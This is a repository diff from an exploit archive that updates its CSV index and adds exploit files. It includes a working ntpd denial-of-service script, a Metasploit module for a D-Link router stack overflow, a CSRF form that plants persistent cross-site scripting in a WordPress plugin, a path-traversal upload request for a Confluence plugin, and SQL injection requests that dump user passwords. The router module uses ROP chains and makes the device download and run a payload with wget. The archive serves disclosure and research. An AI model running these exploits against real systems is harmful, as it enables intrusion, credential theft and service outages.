@ -35190,7 +35195,7 @@ id,file,description,date,author,platform,type,port
37308,platforms/php/webapps/37308.txt,"Ruubikcms 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0
37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0
37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0
37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - module.php Multiple Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0
37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - 'module.php' Multiple Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0
37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 - modules.php URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0
37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 - includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0
37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 - Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0
@ -35744,7 +35749,7 @@ id,file,description,date,author,platform,type,port
38236,platforms/php/webapps/38236.txt,"gpEasy CMS - 'section' Parameter Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0
38237,platforms/php/webapps/38237.txt,"WordPress Theme Chocolate WP - Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0
38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injection",2013-01-25,AkaStep,php,webapps,0
38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80
38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - 'load_data_for_search.php' SQL Injection",2015-09-18,jsass,php,webapps,80
38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps,0
38246,platforms/php/webapps/38246.txt,"iCart Pro - 'section' Parameter SQL Injection",2013-01-25,n3tw0rk,php,webapps,0
38251,platforms/php/webapps/38251.txt,"WordPress Plugin WP-Table Reloaded - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0
@ -36792,4 +36797,11 @@ id,file,description,date,author,platform,type,port
40783,platforms/php/webapps/40783.txt,"Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0
40776,platforms/php/webapps/40776.txt,"EditMe CMS - Cross-Site Request Forgery (Add New Admin)",2016-11-18,Vulnerability-Lab,php,webapps,0
40791,platforms/php/webapps/40791.txt,"ScriptCase 8.1.053 - Multiple Vulnerabilities",2016-11-20,hyp3rlinx,php,webapps,0
40792,platforms/php/webapps/40792.txt,"CMS Made Simple 2.1.5 - Cross-Site Scripting",2016-11-01,"liu zhu",php,webapps,0
40794,platforms/java/webapps/40794.txt,"Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal",2016-11-21,"Julien Ahrens",java,webapps,0
40795,platforms/php/webapps/40795.html,"WordPress Plugin Instagram Feed 1.4.6.2 - Cross-Site Request Forgery",2016-11-21,"Sipke Mellema",php,webapps,80
40799,platforms/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",python,webapps,80
40800,platforms/php/webapps/40800.txt,"LEPTON 2.2.2 - SQL Injection",2016-11-21,"Curesec Research Team",php,webapps,80
40801,platforms/php/webapps/40801.txt,"LEPTON 2.2.2 - Remote Code Execution",2016-11-21,"Curesec Research Team",php,webapps,80
40802,platforms/php/webapps/40802.txt,"FUDforum 3.0.6 - Cross-Site Scripting / Cross-Site Request Forgery",2016-11-21,"Curesec Research Team",php,webapps,80
40803,platforms/php/webapps/40803.txt,"FUDforum 3.0.6 - Local File Inclusion",2016-11-21,"Curesec Research Team",php,webapps,80
40804,platforms/php/webapps/40804.txt,"Wordpress Plugin Olimometer 2.56 - SQL Injection",2016-11-21,"TAD GROUP",php,webapps,0

Can't render this file because it is too large.

137
platforms/java/webapps/40794.txt Executable file
View file

@ -0,0 +1,137 @@
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: AppFusions Doxygen for Atlassian Confluence
Vendor URL: www.appfusions.com
Type: Path Traversal [CWE-22]
Date found: 2016-06-23
Date published: -
CVSSv3 Score: 6.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)
CVE: -
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
AppFusions Doxygen for Atlassian Confluence v1.3.0
older versions may be affected too.
4. INTRODUCTION
===============
With Doxygen in Confluence, you can embed full-structure code documentation:
-Doxygen blueprint in Confluence to allow Doxygen archive imports
-Display documentation from annotated sources such as Java (i.e., JavaDoc),
C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and
UNO/OpenOffice
flavors), Fortran, VHDL, Tcl, D in Confluence.
-Navigation supports code structure (classes, hierarchies, files), element
dependencies, inheritance and collaboration diagrams.
-Search documentation from within Confluence
-Restrict access to who can see/add what
-Doxygen in JIRA also available
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The application offers the functionality to import zipped Doxygen
documentations via a file upload to make them available within a
Confluence page. However the application does not properly validate the
"tempId" parameter, which represents the directory where the contents of
the uploaded file will be extracted and stored to. This leads to a path
traversal vulnerability when "/../" sequences are used as part of the
"tempId" parameter. Since the contents of the uploaded file are
extracted to the traversed directory, this vulnerability could also lead
to Remote Code Execution.
In DoxygenUploadServlet.java (lines 63-64) the "tempId" parameter is
read as part of a GET request to "/plugins/servlet/doxygen/upload" and
afterwards used in a "getTemporaryDirectory()" call:
String tempId = request.getParameter("tempId");
String destination =
this.doxygenManager.getTemporaryDirectory(tempId).getAbsolutePath();
The "getTemporaryDirectory()" function is defined in
DefaultDoxyGenManager.java (lines 38-41) and constructs a file object
based on the "java.io.tmpdir" variable, the static string
"/doxygen-temp/", the user-supplied "tempId" and a file separator in
between all parts:
public File getTemporaryDirectory(String tempId) {
File file = new File(System.getProperty("java.io.tmpdir") +
File.separator + "doxygen-temp" + File.separator + tempId);
return file;
}
In the subsequent code the uploaded file as represented by the "file"
HTTP POST parameter to "/plugins/servlet/doxygen/upload" is extracted to
the directory which was built using the "file" object.
The following Proof-of-Concept triggers this vulnerability by uploading
a zipped file, which will be extracted to "/home/confluence" by the
application:
POST
/plugins/servlet/doxygen/upload?tempId=/../../../../../../home/confluence
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101
Firefox/46.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 966
Content-Type: multipart/form-data;
boundary=---------------------------62841490314755966452122422550
Cookie: doc-sidebar=300px; doxygen_width=256;
JSESSIONID=75A487B49F38A536358C728B1BE5A9E1
Connection: close
-----------------------------62841490314755966452122422550
Content-Disposition: form-data; name="file"; filename="Traversal.zip"
Content-Type: application/zip
[zipped data]
-----------------------------98001232218371736091795669059--
6. RISK
=======
To successfully exploit this vulnerability the attacker must be
authenticated and must have the rights within Atlassian Confluence to
upload Doxygen files (default).
The vulnerability allows remote attackers to upload arbitrary files to
any destination directory writeable by the user of the web server, which
could lead to Remote Code Execution.
7. SOLUTION
===========
Update to AppFusions Doxygen for Atlassian Confluence v1.3.4
8. REPORT TIMELINE (DD/MM/YYYY)
===============================
23/06/2016: Discovery of the vulnerability
23/06/2016: Notified vendor via public security mail address
29/06/2016: No response, sent out another notification w/o details
29/06/2016: Response from vendor who asked for full details
30/06/2016: Sent over preliminary advisory with full details
03/07/2016: No response from vendor, sent out a status request
03/07/2016: Vendor temporarily removes product from website
11/07/2016: Vendor releases v1.3.1 which fixes the issue
20/11/2016: Advisory released

25
platforms/linux/dos/40806.py Executable file
View file

@ -0,0 +1,25 @@
#!/usr/bin/env python
# Exploit Title: ntpd remote pre-auth Denial of Service
# Date: 2016-11-21
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: http://dumpco.re/cve-2016-7434/
# Vendor Homepage: http://www.ntp.org/
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p8.tar.gz
# Version: ntp-4.2.7p22, up to but not including ntp-4.2.8p9, and ntp-4.3.0 up to, but not including ntp-4.3.94
# CVE: CVE-2016-7434
import sys
import socket
if len(sys.argv) != 3:
print "usage: " + sys.argv[0] + " <host> <port>"
sys.exit(-1)
payload = "\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"
print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
print "[+] Done!"

12
platforms/linux/local/895.c
View file

@ -77,17 +77,7 @@
#define MAGIC -123
unsigned char shellcode[] =
"\x60\xe8\x5f\x00\x00\x00\x30\x03\x98\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x50\x52\x49\x56\x41\x54\x45\x2a\x6b\x65\x72\x6e\x65\x6c\x20\x63\x61\x70\x20
\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x2c\x20\x28\x63\x29\x20\x32\x30\x30\x34
\x20\x3c\x73\x64\x40\x68\x79\x73\x74\x65\x72\x69\x61\x2e\x73\x6b\x3e\x2a\x50
\x52\x49\x56\x41\x54\x45\x5b\xbd\x00\xe0\xff\xff\x21\xe5\x81\x7d\x00\x00\x00
\x00\xc0\x72\x03\x8b\x6d\x00\x8d\x4b\x08\xb8\xb8\x00\x00\x00\xcd\x80\x8b\x11
\x8b\x71\x04\x8b\x79\x08\x83\xc5\x04\x39\x55\x00\x75\xf8\x39\x7d\x04\x75\xf3
\x39\x75\x08\x75\xee\x31\xc0\x48\x89\x45\x00\x89\x45\x04\x89\x45\x08\xb8\xb8
\x00\x00\x00\x8d\x4b\x14\xcd\x80\xff\x41\x04\x74\x0b\x89\x55\x00\x89\x7d\x04
\x89\x75\x08\xeb\xc8\x61\xb8\x85\xff\xff\xff\xc3";
"\x60\xe8\x5f\x00\x00\x00\x30\x03\x98\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x52\x49\x56\x41\x54\x45\x2a\x6b\x65\x72\x6e\x65\x6c\x20\x63\x61\x70\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x2c\x20\x28\x63\x29\x20\x32\x30\x30\x34\x20\x3c\x73\x64\x40\x68\x79\x73\x74\x65\x72\x69\x61\x2e\x73\x6b\x3e\x2a\x50\x52\x49\x56\x41\x54\x45\x5b\xbd\x00\xe0\xff\xff\x21\xe5\x81\x7d\x00\x00\x00\x00\xc0\x72\x03\x8b\x6d\x00\x8d\x4b\x08\xb8\xb8\x00\x00\x00\xcd\x80\x8b\x11\x8b\x71\x04\x8b\x79\x08\x83\xc5\x04\x39\x55\x00\x75\xf8\x39\x7d\x04\x75\xf3\x39\x75\x08\x75\xee\x31\xc0\x48\x89\x45\x00\x89\x45\x04\x89\x45\x08\xb8\xb8\x00\x00\x00\x8d\x4b\x14\xcd\x80\xff\x41\x04\x74\x0b\x89\x55\x00\x89\x7d\x04\x89\x75\x08\xeb\xc8\x61\xb8\x85\xff\xff\xff\xc3";
static ltime gtime()
{

300
platforms/multiple/remote/40805.rb Executable file
View file

@ -0,0 +1,300 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Payload working status:
# MIPS:
# - all valid payloads working (the ones that we are able to send without null bytes)
# ARM:
# - inline rev/bind shell works (bind... meh sometimes)
# - stager rev/bind shell FAIL
# - mettle rev/bind fails with sigsegv standalone, but works under strace or gdb...
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow',
'Description' => %q{
Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which
is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol,
which accepts arbitrarily long strings into certain XML parameters and then copies them into
the stack.
This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested
using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and
this vulnerability is present in both MIPS and ARM devices.
The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a
few load and store instructions. Because of this the payloads have to be sent unencoded, which
can cause them to fail, although the bind shell seems to work well.
For the ARM devices, the inline reverse tcp seems to work best.
Check the reference links to see the vulnerable firmware versions.
},
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'References' =>
[
['CVE', '2016-6563'],
['US-CERT-VU', '677427'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt'],
['URL', 'http://seclists.org/fulldisclosure/2016/Nov/38']
],
'DefaultOptions' => { 'WfsDelay' => 10 },
'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground (ARM target)
'Targets' =>
[
[ 'Dlink DIR-818 / 822 / 823 / 850 [MIPS]',
{
'Offset' => 3072,
'LibcBase' => 0x2aabe000, # should be the same offset for all firmware versions and all routers
'Sleep' => 0x56DF0, # sleep() offset into libuClibc-0.9.30.3.so
'FirstGadget' => 0x4EA1C, # see comments below for gadget information
'SecondGadget' => 0x2468C,
'ThirdGadget' => 0x41f3c,
'PrepShellcode1' => "\x23\xbd\xf3\xc8", # addi sp,sp,-3128
'PrepShellcode2' => "\x03\xa0\xf8\x09", # jalr sp
'BranchDelay' => "\x20\x84\xf8\x30", # addi a0,a0,-2000 (nop)
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00",
'EncoderType' => Msf::Encoder::Type::Raw # else it will fail with SIGILL, this CPU is crippled
},
}
],
[ 'Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]',
{
'Offset' => 1024,
'LibcBase' => 0x400DA000, # we can pick any xyz in 0x40xyz000 (an x of 0/1 works well)
'System' => 0x5A270, # system() offset into libuClibc-0.9.32.1.so
'FirstGadget' => 0x18298, # see comments below for gadget information
'SecondGadget' => 0x40CB8,
'Arch' => ARCH_ARMLE,
}
],
],
'DisclosureDate' => 'Nov 7 2016',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('SLEEP', [true, 'Seconds to sleep between requests (ARM only)', '0.5']),
OptString.new('SRVHOST', [true, 'IP address for the HTTP server (ARM only)', '0.0.0.0']),
OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']),
OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']),
OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']),
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/HNAP1/',
'method' => 'POST',
'Content-Type' => 'text/xml',
'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' }
})
if res && res.code == 500
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def calc_encode_addr (offset, big_endian = true)
if big_endian
[(target['LibcBase'] + offset).to_s(16)].pack('H*')
else
[(target['LibcBase'] + offset).to_s(16)].pack('H*').reverse
end
end
def prepare_shellcode_arm (cmd)
#All these gadgets are from /lib/libuClibc-0.9.32.1.so, which is the library used for all versions of firmware for all ARM routers
#first_gadget (pops system() address into r3, and second_gadget into PC):
#.text:00018298 LDMFD SP!, {R3,PC}
#second_gadget (puts the stack pointer into r0 and calls system() at r3):
#.text:00040CB8 MOV R0, SP
#.text:00040CBC BLX R3
#system() (Executes argument in r0 (our stack pointer)
#.text:0005A270 system
#The final payload will be:
#'a' * 1024 + 0xffffffff + 'b' * 16 + 'AAAA' + first_gadget + system() + second_gadget + command
shellcode = rand_text_alpha(target['Offset']) + # filler
"\xff\xff\xff\xff" + # n integer overwrite (see advisory)
rand_text_alpha(16) + # moar filler
rand_text_alpha(4) + # r11
calc_encode_addr(target['FirstGadget'], false) + # first_gadget
calc_encode_addr(target['System'], false) + # system() address
calc_encode_addr(target['SecondGadget'], false) + # second_gadget
cmd # our command
end
def prepare_shellcode_mips
#All these gadgets are from /lib/libuClibc-0.9.30.3.so, which is the library used for all versions of firmware for all MIPS routers
#<sleep> is at 56DF0
#first gadget - execute sleep and call second_gadget
#.text:0004EA1C move $t9, $s0 <- sleep()
#.text:0004EA20 lw $ra, 0x20+var_4($sp) <- second_gadget
#.text:0004EA24 li $a0, 2 <- arg for sleep()
#.text:0004EA28 lw $s0, 0x20+var_8($sp)
#.text:0004EA2C li $a1, 1
#.text:0004EA30 move $a2, $zero
#.text:0004EA34 jr $t9
#.text:0004EA38 addiu $sp, 0x20
#second gadget - put stack pointer in a1:
#.text:0002468C addiu $s1, $sp, 0x58
#.text:00024690 li $s0, 0x44
#.text:00024694 move $a2, $s0
#.text:00024698 move $a1, $s1
#.text:0002469C move $t9, $s4
#.text:000246A0 jalr $t9
#.text:000246A4 move $a0, $s2
#third gadget - call $a1 (stack pointer):
#.text:00041F3C move $t9, $a1
#.text:00041F40 move $a1, $a2
#.text:00041F44 addiu $a0, 8
#.text:00041F48 jr $t9
#.text:00041F4C nop
#When the crash occurs, the stack pointer is at xml_tag_value[3128]. In order to have a larger space for the shellcode (2000+ bytes), we can jump back to the beggining of the buffer.
#prep_shellcode_1: 23bdf7a8 addi sp,sp,-3128
#prep_shellcode_2: 03a0f809 jalr sp
#branch_delay: 2084f830 addi a0,a0,-2000
#The final payload will be:
#shellcode + 'a' * (2064 - shellcode.size) + sleep() + '%31' * 4 + '%32' * 4 + '%33' * 4 + third_gadget + first_gadget + 'b' * 0x1c + second_gadget + 'c' * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay
shellcode = payload.encoded + # exploit
rand_text_alpha(target['Offset'] - payload.encoded.length) + # filler
calc_encode_addr(target['Sleep']) + # s0
rand_text_alpha(4) + # s1
rand_text_alpha(4) + # s2
rand_text_alpha(4) + # s3
calc_encode_addr(target['ThirdGadget']) + # s4 (third gadget)
calc_encode_addr(target['FirstGadget']) + # initial pc / ra (first_gadget)
rand_text_alpha(0x1c) + # filler
calc_encode_addr(target['SecondGadget']) + # second_gadget
rand_text_alpha(0x58) + # filler
target['PrepShellcode1'] + # exploit prep
target['PrepShellcode2'] + # exploit prep
target['BranchDelay'] # exploit prep
end
def send_payload (payload)
begin
# the payload can go in the Action, Username, LoginPassword or Captcha XML tag
body = %{
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<Login xmlns="http://purenetworks.com/HNAP1/">
<Action>something</Action>
<Username>Admin</Username>
<LoginPassword></LoginPassword>
<Captcha>#{payload}</Captcha>
</Login>
</soap:Body>
</soap:Envelope>
}
res = send_request_cgi({
'uri' => '/HNAP1/',
'method' => 'POST',
'ctype' => 'text/xml',
'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' },
'data' => body
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
end
end
# Handle incoming requests from the server
def on_request_uri(cli, request)
#print_status("on_request_uri called: #{request.inspect}")
if (not @pl)
print_error("#{peer} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{peer} - Sending the payload to the device...")
@elf_sent = true
send_response(cli, @pl)
end
def exploit
print_status("#{peer} - Attempting to exploit #{target.name}")
if target == targets[0]
send_payload(prepare_shellcode_mips)
else
downfile = rand_text_alpha(8+rand(8))
@pl = generate_payload_exe
@elf_sent = false
resource_uri = '/' + downfile
#do not use SSL
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
print_status("#{peer} - Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
print_status("#{peer} - Asking the device to download and execute #{service_url}")
filename = rand_text_alpha_lower(rand(8) + 2)
cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &"
shellcode = prepare_shellcode_arm(cmd)
print_status("#{peer} - \"Bypassing\" the device's ASLR. This might take up to 15 minutes.")
counter = 0.00
while (not @elf_sent)
if counter % 50.00 == 0 && counter != 0.00
print_status("#{peer} - Tried #{counter.to_i} times in #{(counter * datastore['SLEEP'].to_f).to_i} seconds.")
end
send_payload(shellcode)
sleep datastore['SLEEP'].to_f # we need to be in the LAN, so a low value (< 1s) is fine
counter += 1
end
print_status("#{peer} - The device downloaded the payload after #{counter.to_i} tries / #{(counter * datastore['SLEEP'].to_f).to_i} seconds.")
end
end
end

21
platforms/php/webapps/40792.txt
View file

@ -1,21 +0,0 @@
Exploit Title: CMS made simple Persistent XSS vulnerability
Date:2016-11-01
Exploit Author: liu zhu
Vendor Homepage:http://www.cmsmadesimple.org/
Software Link:http://101.110.118.22/s3.amazonaws.com/cmsms/downloads/13469/cmsms-2.1.5-install.zip
Version:2.1.5
Tested on:chrome/firefox
details:
Adminlog.php is used to record the operation log of the administrator and the
website editor. It does not filter the XSS script. So The website editors(lower
Privilege user) can attack the administrator, such as XSS phishing,CSRF.
The steps to reproduce are below:
1. The website editor logs in and click "Content->news". input any XSS script(such as "<img src=# onerror=alert(1)>") in title and submit.
2. Then the administrator log in and click "site admin- admin log" , the XSS script will be triggered.
Affact:
The vulnerability can be used to XSS Phishing or Cookie stolen attack

71
platforms/php/webapps/40795.html Executable file
View file

@ -0,0 +1,71 @@
<!--
Source: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_instagram_feed_plugin_via_csrf.html
Persistent Cross-Site Scripting in Instagram Feed plugin via CSRF
Abstract
A persistent Cross-Site Scripting vulnerability was found in the Instagram Feed plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a URL provided by an attacker.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160724-0014
Tested versions
This issue was successfully tested on the Instagram Feed WordPress Plugin version 1.4.6.2.
Fix
This issue is resolved in Instagram Feed WordPress Plugin version 1.4.7.
Introduction
Instagram Feed is a WordPress plugin to display beautifully clean, customizable, and responsive feeds from multiple Instagram accounts. A persistent Cross-Site Scripting vulnerability was found in the Instagram Feed plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a URL provided by an attacker.
Details
The settings page of the Instagram Feed plugin does not perform CSRF checks. It's possible to change all settings in the plugin by making an authenticated administrator perform a request to change the settings (CSRF). It's possible to change the Instagram access token and id to show images of other users. It's also possible to inject malicious JavaScript in the Customize section, to perform Persistent Cross-Site Scripting. Any user visiting the Instagram Feed will be injected with the attackers payload after the CSRF attack.
Proof of Concept
Have an authenticated admin visit a webpage with the following form:
-->
<html>
<body>
<form action="http://<wordpress site>/wp-admin/admin.php?page=sb-instagram-feed&tab=customize" method="POST">
<input type="hidden" name="sb&#95;instagram&#95;settings&#95;hidden&#95;field" value="Y" />
<input type="hidden" name="sb&#95;instagram&#95;customize&#95;hidden&#95;field" value="Y" />
<input type="hidden" name="sb&#95;instagram&#95;width" value="100" />
<input type="hidden" name="sb&#95;instagram&#95;width&#95;unit" value="&#37;" />
<input type="hidden" name="sb&#95;instagram&#95;height" value="100" />
<input type="hidden" name="sb&#95;instagram&#95;height&#95;unit" value="&#37;" />
<input type="hidden" name="sb&#95;instagram&#95;background" value="&#35;474747" />
<input type="hidden" name="sb&#95;instagram&#95;sort" value="none" />
<input type="hidden" name="sb&#95;instagram&#95;num" value="20" />
<input type="hidden" name="sb&#95;instagram&#95;cols" value="4" />
<input type="hidden" name="sb&#95;instagram&#95;image&#95;res" value="auto" />
<input type="hidden" name="sb&#95;instagram&#95;image&#95;padding" value="5" />
<input type="hidden" name="sb&#95;instagram&#95;image&#95;padding&#95;unit" value="px" />
<input type="hidden" name="sb&#95;instagram&#95;show&#95;header" value="on" />
<input type="hidden" name="sb&#95;instagram&#95;header&#95;color" value="" />
<input type="hidden" name="sb&#95;instagram&#95;show&#95;btn" value="on" />
<input type="hidden" name="sb&#95;instagram&#95;btn&#95;background" value="" />
<input type="hidden" name="sb&#95;instagram&#95;btn&#95;text&#95;color" value="" />
<input type="hidden" name="sb&#95;instagram&#95;btn&#95;text" value="Load&#32;More&#46;&#46;&#46;" />
<input type="hidden" name="sb&#95;instagram&#95;show&#95;follow&#95;btn" value="on" />
<input type="hidden" name="sb&#95;instagram&#95;folow&#95;btn&#95;background" value="" />
<input type="hidden" name="sb&#95;instagram&#95;follow&#95;btn&#95;text&#95;color" value="" />
<input type="hidden" name="sb&#95;instagram&#95;follow&#95;btn&#95;text" value="Follow&#32;on&#32;Instagram" />
<input type="hidden" name="sb&#95;instagram&#95;exclude&#95;words" value="" />
<input type="hidden" name="sb&#95;instagram&#95;include&#95;words" value="" />
<input type="hidden" name="sb&#95;instagram&#95;hide&#95;photos" value="" />
<input type="hidden" name="sb&#95;instagram&#95;block&#95;users" value="" />
<input type="hidden" name="sb&#95;instagram&#95;custom&#95;css" value="" />
<input type="hidden" name="sb&#95;instagram&#95;custom&#95;js" value="&#125;&#13;&#10;&#125;&#41;&#59;<&#47;script><script>alert&#40;1&#41;&#59;<&#47;script>&#13;&#10;" />
<input type="hidden" name="submit" value="Save&#32;Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!-- The Custom JavaScript section will now be saved with the attacker's JavaScript payload. -->

113
platforms/php/webapps/40800.txt Executable file
View file

@ -0,0 +1,113 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/
important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to 11/10/2016
public:
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to multiple SQL injections. The injections require a user account
with elevated privileges.
3. Details
SQL Injection: Search Page
CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description: The "terms" parameter of the page search is vulnerable to SQL
Injection. A user account with the right "Pages" is required to access this
feature.
Proof of Concept:
POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken=
3f7020b05ec343675b6b2z1472137594 HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=
fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close Content-Type: application/x-www-form-urlencoded
Content-Length: 154 search_scope=title&terms=" union select
username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
from lep_users -- -&search=Search
Blind or Error-based SQL Injection: Create Page
CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description: The "parent" parameter of the create page functionality is
vulnerable to SQL Injection. A user account with the right "Pages" is required
to access this feature. The injection is blind or error based in the case that
PHP is configured to show errors.
Proof of Concept:
POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken=
dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1 Host: localhost Accept-Language:
